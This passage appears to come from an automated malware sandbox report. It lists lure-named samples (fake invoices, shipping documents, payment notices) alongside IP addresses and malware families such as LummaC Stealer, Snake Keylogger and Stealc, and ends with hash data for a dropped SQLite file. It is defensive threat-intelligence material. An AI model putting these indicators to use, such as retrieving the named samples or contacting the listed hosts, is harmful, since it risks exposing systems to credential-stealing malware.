                                                                                                                  Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.18.27.193
                                                                                                                  FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.32.1
                                                                                                                  CLOUDFLARENETUSLWLwodPZiq.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 188.114.96.3
                                                                                                                  XkgoE6Yb52.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  oNvY66Z8jp.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.149.252
                                                                                                                  Pmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  Kariny CV.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 188.114.96.3
                                                                                                                  Commercial Invoice Confirmation-1132346.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.16.1
                                                                                                                  jjmax il.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.64.1
                                                                                                                  Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.22.74.216
                                                                                                                  Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.74.232
                                                                                                                  Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.18.27.193
                                                                                                                  GOOGLE-2USPayment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 35.207.24.140
                                                                                                                  Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 35.207.24.140
                                                                                                                  Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 35.207.24.140
                                                                                                                  Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 35.207.24.140
                                                                                                                  Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 35.214.196.202
                                                                                                                  Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 35.207.24.140
                                                                                                                  http://ln.run/aktivasi-tarif-Bank-BSI-idGet hashmaliciousUnknownBrowse
                                                                                                                  • 35.214.168.80
                                                                                                                  https://files.fm/f/kxnrfq5y8g?share_email_id=15e8956&share_email_skip_notify=trueGet hashmaliciousUnknownBrowse
                                                                                                                  • 35.219.151.53
                                                                                                                  https://attservero.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 35.214.206.12
                                                                                                                  res.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                  • 35.216.220.147
                                                                                                                  ARTNET2PLXkgoE6Yb52.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 91.206.178.120
                                                                                                                  oNvY66Z8jp.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 91.206.178.120
                                                                                                                  Pmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 91.206.178.120
                                                                                                                  4Osfx7gnSx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                  • 185.104.113.237
                                                                                                                  fqJIOoSp5U.dllGet hashmaliciousUnknownBrowse
                                                                                                                  • 91.206.178.125
                                                                                                                  QZzvG5G6VE.exeGet hashmaliciousStealcBrowse
                                                                                                                  • 91.206.178.118
                                                                                                                  mrkjKujfkP.exeGet hashmaliciousStealcBrowse
                                                                                                                  • 91.206.178.118
                                                                                                                  vR19oQpY8c.exeGet hashmaliciousStealcBrowse
                                                                                                                  • 91.206.178.118
                                                                                                                  sql.tmp.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                  • 91.206.178.125
                                                                                                                  UrQrIdRfCg.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 185.104.112.62
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eXkgoE6Yb52.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 35.208.212.94
                                                                                                                  oNvY66Z8jp.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 35.208.212.94
                                                                                                                  Pmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 35.208.212.94
                                                                                                                  Commercial Invoice Confirmation-1132346.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 35.208.212.94
                                                                                                                  jjmax il.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 35.208.212.94
                                                                                                                  Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 35.208.212.94
                                                                                                                  Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 35.208.212.94
                                                                                                                  Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 35.208.212.94
                                                                                                                  FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 35.208.212.94
                                                                                                                  Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                                                                  • 35.208.212.94
                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1LWLwodPZiq.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 188.114.97.3
                                                                                                                  Xw9oZv75Ze.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                  • 188.114.97.3
                                                                                                                  LWWWDBoeGo.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, VidarBrowse
                                                                                                                  • 188.114.97.3
                                                                                                                  hHtR1O06GH.exeGet hashmaliciousAmadey, Healer AV Disabler, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                  • 188.114.97.3
                                                                                                                  lX1M7MPt7Y.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                  • 188.114.97.3
                                                                                                                  lABrOaOkQK.exeGet hashmaliciousAmadey, GCleaner, LummaC StealerBrowse
                                                                                                                  • 188.114.97.3
                                                                                                                  Aura.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                                                  • 188.114.97.3
                                                                                                                  installer-unpadded.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 188.114.97.3
                                                                                                                  keynote.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 188.114.97.3
                                                                                                                  JJsploit_fix.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 188.114.97.3
                                                                                                                  No context
                                                                                                                  Process:C:\Windows\Temp\cmd.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):40960
                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                  Malicious:false
                                                                                                                  Reputation:high, very likely benign file
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................